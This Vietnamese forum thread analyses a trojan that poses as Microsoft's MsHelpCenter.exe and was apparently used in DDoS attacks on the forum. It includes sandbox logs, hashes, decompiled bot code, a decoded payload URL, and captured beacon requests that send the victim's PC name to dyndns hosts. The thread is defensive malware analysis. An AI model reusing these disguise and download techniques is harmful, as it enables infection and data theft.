Delete File: %SystemRoot%\Microsoft Help\thumbcache.db
Create File: %SystemRoot%\Microsoft Help\thumbcache.db
Set File Attributes: %SystemRoot%\Microsoft Help\thumbcache.db Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: %SystemRoot%\Microsoft Help\_desktop.ini Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\_desktop.ini
Create File: %SystemRoot%\Microsoft Help\_desktop.ini
Set File Attributes: %SystemRoot%\Microsoft Help\_desktop.ini Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.idx Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.idx
Create File: %SystemRoot%\Microsoft Help\MsHelpCenter.idx
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.old Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.old
Move File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe to %SystemRoot%\Microsoft Help\MsHelpCenter.old
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe
Create File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe
Set File Attributes: C:\MsHelpCenter.pdb Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\MsHelpCenter.pdb
Create File: C:\MsHelpCenter.pdb
Set File Attributes: C:\MsHelpCenter.pdb Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Delete File: C:\80423577.rar
Move File: C:\80423577.exe to C:\80423577.rar
Set File Attributes: C:\80423577.rar Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Copy File: C:\MsHelpCenter.pdb to C:\80423577.exe
Open File: %SystemRoot%\AppPatch\sysmain.sdb
Open File: %SystemRoot%\AppPatch\systest.sdb
Open File: \Device\NamedPipe\ShimViewer
Open File: C:\
Find File: C:\80423577.exe
]]>
/hvaonline/posts/list/39641.html#244129 /hvaonline/posts/list/39641.html#244129 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Microsoft Help Center\DatabaseIndex = [REG_DWORD, value: 00000002]
HKEY_CURRENT_USER\Software\Microsoft\Windows\Microsoft Help Center\ContentHash = 470065006E006500720061006C00
]]>
/hvaonline/posts/list/39641.html#244130 /hvaonline/posts/list/39641.html#244130 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
nhưng mấy anh ơi, bài toán lại bắt đầu lại rồi : MsHelpCenter.exe Câu hỏi: ai tải cái và các file kia về ?? :| Trả lời nốt câu này mới ổn ?? 
Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK? --------- Tôi cho rằng có lẽ một trojạn nhất định phải nằm trong file MsHelpCenter.idx ấy. [8.8 MB- Modified: (chắc bởi STL) Friday, December 31, 2010, 9:34:38 AM] Có lẽ trojạn embedded trong file này (trojạn thuôc loại Downloader-Dropper trojạn gì đó) mới được dùng để download Adobeupdater.exe về chứ. Kiểm tra sơ bộ thì dường như vậy. Nhưng để kiểm tra kỹ hơn, vì đang bận check cái webserver (master website) mà asaxin cung cấp. Đây chắc là master website chứa Adobeupdater.exe nhúng trong một image file .jpg Các file khác -desktop.ini, thumb.... thì theo tôi không cần quan tâm ]]>
/hvaonline/posts/list/39641.html#244131 /hvaonline/posts/list/39641.html#244131 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK?  
Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned :) : http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090]]>
/hvaonline/posts/list/39641.html#244135 /hvaonline/posts/list/39641.html#244135 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Đúng rồi có một Trojạn nằm trong file MsHelpCenter.idx , như tôi nói ở trên Đây là một trojạn khá mới, vì các virus DAT file của F-secure chỉ mới update vào cuối tháng 5 năm 2011. Trình Avira AntiVir cài trong máy của tôi không phát hiện được trojan này khi download nó từ Mediafire về, dù Avira để ở chế độ Guard:active. Tuy nhiên scan thẳng vào file thì phát hiện ra. Còn trình McAfee (enterprise) cũng cài trên máy tôi thì không phát hiện ra gì, dù scan thẳng vào file Avira gọi nó là TR/Dropper.Gen4, còn F-secure gọi là Backdoor.Generic.649884, AVG gọi là Dropper.Generic3.BNIS, Avas goi Win32:Malware-gen... vân vân. Riêng SpyRemove thì gọi với tên dài BackDoor.Generic 12.APEB ,mô tả nó như một trojan-backdoor nguy hiểm chay trong hệ thống cho phép hacker thâm nhập từ xa vào các máy bị nhiễm trojan trên mạng. BackDoor.Generic 12.APEB sử dụng một chương trình cho phép download về máy nhiễm trojan các file nguy hiểm từ trên mạng. Trojan này cũng có một keylogger thu thập các thông tin cá nhân từ máy nạn nhân (bị nhiễm Trojan) gửi đến các webserver của hacker... Vậy trojan này chính là công cụ download Adobeupdater.exe và các file tương tự khác từ Master websites về máy nạn nhân (chứ không phải là MsHelpCenter.exe ). Các bạn kiểm tra kỹ sẽ thấy. ]]> /hvaonline/posts/list/39641.html#244136 /hvaonline/posts/list/39641.html#244136 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:

PXMMRF wrote:
Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK?  
Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned :) : http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090 
Nó đây nè bolzano_1989 ạ Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS. Bản phân tích của MsHelpCenter.exe đây nè:

]]>
/hvaonline/posts/list/39641.html#244139 /hvaonline/posts/list/39641.html#244139 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244141 /hvaonline/posts/list/39641.html#244141 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244142 /hvaonline/posts/list/39641.html#244142 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244144 /hvaonline/posts/list/39641.html#244144 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244146 /hvaonline/posts/list/39641.html#244146 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244147 /hvaonline/posts/list/39641.html#244147 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Rolex0210 wrote:
Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời :) Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^ Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ??? 
bolzano_1989 nghĩ anh/chị nên gửi anh TQN xem qua trước khi đưa bài viết lên báo để tránh các sai sót về kĩ thuật :) .]]>
/hvaonline/posts/list/39641.html#244149 /hvaonline/posts/list/39641.html#244149 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244150 /hvaonline/posts/list/39641.html#244150 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244152 /hvaonline/posts/list/39641.html#244152 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default. cái link để download là http://poxxf.com/flash.swf?cpn=<User name>   Thôi tiêu, em vừa thấy acoustics89 nhắc đến User Agent: Gozilla và cấu trúc request kiểu ?cpn=[PC USERNAME] Bài trước em có nhắc đến User Agent này, vì vội quá nên chưa gửi cho a PXMMRF được. Phải chăng file unikey ở http://nethoabinh.com/showthread.php?t=315, và nghi ngờ ở http://nethoabinh.com/showthread.php?t=651 cũng của STL (nhưng file này đã bị xoá) ??? Các từ khoá liên quan đến việc tải unikey, flash player trên google trang này (nethoabinh) đều có kết quả đứng đầu (top). Vừa bật lại cái Wireshark, có 1 vài thông tin bắt được (tên miền gì toàn tiếng Trung Quốc >"<):
maowoli.dyndns-free.com (Destination IP: 78.110.24.85) biouzhen.dyndns-server.com (Destination IP: 78.110.24.85) tongfeirou.dyndns-web.com (Destination: server86944.santrex.net)  
Vẫn chưa biết được service/process nào liên quan đến những URL này :(. Em đang bật smartsniff của nirsoft nhưng tình hình có vẻ im lặng quá. Ngóng chờ tiếp :(]]>
/hvaonline/posts/list/39641.html#244154 /hvaonline/posts/list/39641.html#244154 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: maowoli.dyndns-free.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: biouzhen.dyndns-server.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: tongfeirou.dyndns-web.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: maowoli.dyndns-free.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: biouzhen.dyndns-server.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close   ]]> /hvaonline/posts/list/39641.html#244155 /hvaonline/posts/list/39641.html#244155 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Giờ rãnh rỗi, ngồi úp cái đống MsHelpCenter.* lên KIS, MS, Avira, Symantec. Mô tả bằng tiếng Anh khó quá. Thôi viết tiếng Việt rồi dùng Google Translate ra đại cho rồi. Hy vọng mấy thằng bên đó đọc hiểu được 50%. Mấy anh STL chơi ác quá ha, nhét dump bitmap, dump resource data vào mấy cái file của mấy anh để mấy file đó bự bà cố luôn, 8-9 MB, để bà con khỏi úp lên các AV và các online scan phải không ? Hồi chiều, ngồi tự hỏi: quái, tụi này không không nhét mấy cái "Background" Bmp Resource tới 8-9 MB vào file PE của tụi nó chi vầy ? Đọc code, debug, breakpoint đủ kiểu chả thấy nó đụng tới Bmp Resource gì cả ! Không sao, em remove mấy cái dump resource, dump bitmap đó đi, up tuốt. Giờ úp lại nè, nãy giờ úp 2 lần đều faild hết. File em đã úp cái đống đó lên tới 26MB. Giờ up được rồi. File up chỉ còn 247 KB, chuyện nhỏ. Tụi này dùng giới hạn up file của các trang web submit sample của các AVs, thông thường là 8 MB.  
Hì hì, em cứ viết 1 bức thư bằng tiếng Việt, trình bày cụ thể từng chi tiết theo góc độ kỹ thuật em nhận định rồi gởi cho anh. Anh chuyển nó sang tiếng Anh và gởi ngược lại cho em ngay trong vòng vài phút. Đừng dùng google translate em vì nó buồn cười lắm :). ]]>
/hvaonline/posts/list/39641.html#244156 /hvaonline/posts/list/39641.html#244156 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244158 /hvaonline/posts/list/39641.html#244158 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244159 /hvaonline/posts/list/39641.html#244159 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

bolzano_1989 wrote:

PXMMRF wrote:
Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà original name: MsHelpCenter.exe internal name: (cũng là) MsHelpCenter.exe file version.: 6.1.7600.16385 MD5 : 915e9432ca9414a771071ee0cc115930 SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6 SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms File size : 9332736 bytes OK?  
Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned :) : http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090 
Nó đây nè bolzano_1989 ạ Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS. Bản phân tích của MsHelpCenter.exe đây nè:

 
Gửi chú PXMMRF, Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck: publisher....: Microsoft Corporation copyright....: (c) Microsoft Corporation. All rights reserved. product......: Microsoft_ Windows_ Operating System description..: Microsoft Help Center original name: MsHelpCenter.exe internal name: MsHelpCenter.exe file version.: 6.1.7600.16385 
Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau: Verified: Unsigned File date: 9:34 AM 12/31/2010 Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này :) . Đồng thời file này không được digitally signed bởi Microsoft Windows.]]>
/hvaonline/posts/list/39641.html#244165 /hvaonline/posts/list/39641.html#244165 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244167 /hvaonline/posts/list/39641.html#244167 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#244169 /hvaonline/posts/list/39641.html#244169 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Gửi chú PXMMRF, Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck: publisher....: Microsoft Corporation copyright....: (c) Microsoft Corporation. All rights reserved. product......: Microsoft_ Windows_ Operating System description..: Microsoft Help Center original name: MsHelpCenter.exe internal name: MsHelpCenter.exe file version.: 6.1.7600.16385 
Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau: Verified: Unsigned File date: 9:34 AM 12/31/2010 Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này :) . Đồng thời file này không được digitally signed bởi Microsoft Windows. 
Trước hết cám ơn bolzano_1989 vì đã quote lai các file hình ảnh trên bài tôi viết. Tôi thường bổ sung hình ảnh để bài viết khỏi nhàm chán, các bạn đỡ mất công phải click nhiều lần và xem cho sướng mắt. Cũng còn có đôi lý do khác, hay hay đấy. Sau nữa cảm ơn về những đóng góp của bạn, thể hiện việc bạn luôn không ngai khó, tìm hiểu đến cùng những vấn đề mình chưa biết hay chưa đồng ý. Đó là đức tinh quý và cần của người làm bảo mật. Trước đây Triệu trần Đức cũng có đức tính này. Quay trở lại vấn đề file MSHelpCenter.exe, tôi có thêm ý kiến sau: 1- Đây là file nguyên thuỷ (originally made) của MS. Hầu hết các OS của MS đều sử dụng file này. 2- Nhưng cũng vì vậy có rất nhiều phiên bản (version) của file nói trên. MS lọc -cắt bớt- bổ sung file nguyên thuỷ cho phù hợp với từng OS. Vì vậy nói về file MSHelpCenter.exe là phải nói chính xác là nó ở OS nào, đã được update chưa? Đã có một công ty chuyên làm về File Database thống kê hiên nay có tới gần 60 loại file MSHelpCenter.exe với nôi dung có các điểm khác nhau, dung lượng khác nhau (tất nhiên MD5 cũng khác nhau) Tham khảo tại: http://systemexplorer.net/db/mshelpcenter.exe.html 3- Có lẽ chính vì vậy mà MS khó hay không thể áp dụng việc Digitally signed cho tất cả các file MSHelpCenter.exe trong thưc tế. Tất nhiên các file khác chỉ có 1 version hay một vài version thì có thể. 4- Như tôi đã nói ở post trên, các hacker hay đặt tên các service, process, file của virus trùng đúng với tên service, process, file nguyên thuỷ của các HDH, nhằm làm cho user không nghi ngờ hay nếu nghi ngờ thì lại bối rối .... Do vậy không loại trừ khả năng có một hacker nào đó trên TG đã đặt tên file của virus là MSHelpCenter.exe, hay nhúng virus vào trong file này (Thưc tế điều này đã có- Xin xem hình cho đỡ mỏi tay click)
5- Trong trường hợp nghi ngờ một file loại này có virus mà không thể kiểm bằng digitally signed thì đành phải kiểm bằng cách khác, như tôi đã nói: kiểm vị trí đúng (right location) của file trong directory. Hacker không có thể đặt các file trùng tên trong một folder, nhưng trong 2 folder khác nhau thì lại được. Tuy nhiên ở các OS khác nhau thì vị trí đúng của file có thể khác nhau. Đó là điều khó. Và cách đáng tin nhất nhất là check nó trên mạng để kiểm tra có nhiễm virus hay không, như tôi đã làm với file MSHelpCenter.exe và post hình lên. Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng). Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác ngoài file nói trên]]>
/hvaonline/posts/list/39641.html#244174 /hvaonline/posts/list/39641.html#244174 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng). Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác  
Gửi anh PXMMRF, Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ. Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh. Rang0 !]]>
/hvaonline/posts/list/39641.html#244175 /hvaonline/posts/list/39641.html#244175 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng). Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác  
Gửi anh PXMMRF, Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ. Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh. Rang0 ! 
Tôi đọc kỹ, rất kỹ là khác. Nhưng chính TQN cũng đang thấy cần phải kiểm tra lai mà. Xem những post cuối cùng của TQN (xem kỹ nhé- Thanks)]]>
/hvaonline/posts/list/39641.html#244176 /hvaonline/posts/list/39641.html#244176 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd) { int v4; // eax@0 unsigned int v6; // [sp-10h] [bp-38h]@1 HANDLE hObject; // [sp+0h] [bp-28h]@12 DWORD ThreadId; // [sp+4h] [bp-24h]@12 WCHAR v9; // [sp+8h] [bp-20h]@4 LPCWSTR lpFileName; // [sp+Ch] [bp-1Ch]@4 unsigned int *v11; // [sp+10h] [bp-18h]@1 int v12; // [sp+18h] [bp-10h]@1 int (__cdecl *v13)(int, PVOID, int); // [sp+1Ch] [bp-Ch]@1 unsigned int v14; // [sp+20h] [bp-8h]@1 int v15; // [sp+24h] [bp-4h]@1 int v16; // [sp+28h] [bp+0h]@1 v13 = _except_handler4; v12 = v4; v14 = __security_cookie ^ (unsigned int)&unk_4126C8; v6 = (unsigned int)&v16 ^ __security_cookie; v11 = &v6; v15 = 0; SetUnhandledExceptionFilter(TopLevelExceptionFilter); if ( lstrlenW(lpCmdLine) <= 3 ) { if ( !lstrlenW(lpCmdLine) ) { ThreadId = 0; hObject = CreateThread(0, 0x80000u, StartAddress, 0, 0, &ThreadId); CloseHandle(hObject); create_bot(); } } else { if ( *lpCmdLine == '-' && lpCmdLine[2] == ' ' ) { v9 = lpCmdLine[1]; lpFileName = lpCmdLine + 3; switch ( v9 ) { case 'd': delete_file(lpFileName); break; case 'r': create_process(lpFileName, &CommandLine, 0); break; case 'b': create_new_process(lpFileName, 0); break; } } } return 0; }  và Code:
lstrcpyW(&SubKey, L"softw");
  lstrcatW(&SubKey, L"are\\micr");
  lstrcpyW((LPWSTR)&v6, L"kjewoopipo");
  lstrcatW(&SubKey, L"osoft\\w");
  lstrcpyW((LPWSTR)&v6, L"rewfe");
  lstrcatW(&SubKey, L"indo");
  lstrcatW(&SubKey, L"ws\\");
  lstrcatW(&SubKey, L"Microsoft Help Center");
  RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &hKey, &dwDisposition);
  cbData = 2000;
  v12 = RegQueryValueExW(hKey, ValueName, 0, &Type, (LPBYTE)Data, &cbData);
  if ( v12 )
  {
    v1 = lstrlenW((LPCWSTR)Data);
    RegSetValueExW(hKey, ValueName, 0, 1u, (const BYTE *)Data, 2 * v1);
  }
  RegCloseKey(hKey);
Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ? ]]>
/hvaonline/posts/list/39641.html#244177 /hvaonline/posts/list/39641.html#244177 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:
Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix
 
BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? .Rất hoan nghênh. Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011?]]>
/hvaonline/posts/list/39641.html#244178 /hvaonline/posts/list/39641.html#244178 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244179 /hvaonline/posts/list/39641.html#244179 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? [/color].Rất hoan nghênh. Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011? 
Con fake adobe thì em thấy mới có thứ 7 tuần trước, còn con idx kia thì em ko biết rõ vì máy em ko có file này để check lúc trước :D . ]]>
/hvaonline/posts/list/39641.html#244180 /hvaonline/posts/list/39641.html#244180 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:
Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?  
Tôi ghi nhân ý kiến của bạn và tôi sẽ nghiên cứu kỹ để làm rõ 1 vài vấn đề đến nay tôi vẫn còn thắc mắc. Thanks (Tôi cũng sẽ kiểm tra lai code của file này lần nữa, dù kinh nghiêm khả năng về mặt này thưc ra không bằng TQN) Đó là: 1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?) 2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus? 3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình?? ]]>
/hvaonline/posts/list/39641.html#244182 /hvaonline/posts/list/39641.html#244182 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 
Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây?]]>
/hvaonline/posts/list/39641.html#244183 /hvaonline/posts/list/39641.html#244183 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA. trong MSHelpCenter.exe File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD địa chỉ của hàm decode :401B30h Hàm download : 4015B0h Ngoài ra còn hàm này để ghi key trong registry:4017F0h Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ 
Cám ơn các thông tin của em và anh rất tin vào những dòng code em post lên, nó đã rõ ràng như em nhận định. Nhưng chỉ hỏi thêm điều này, nêu thấy không tiện thì không trả lời cũng được: Em có chắc chắn máy em dùng dể desassembling các file ấy có "clean" 100% hay không? Note. Anh đã cẩn thận check file MSHelpCenter.exe không chỉ trên virustotal mà còn trên ít nhất 8 filechecking website khác nữa, của các hảng antivirus nổi tiếng nhất. Hì hì ]]>
/hvaonline/posts/list/39641.html#244185 /hvaonline/posts/list/39641.html#244185 GMT
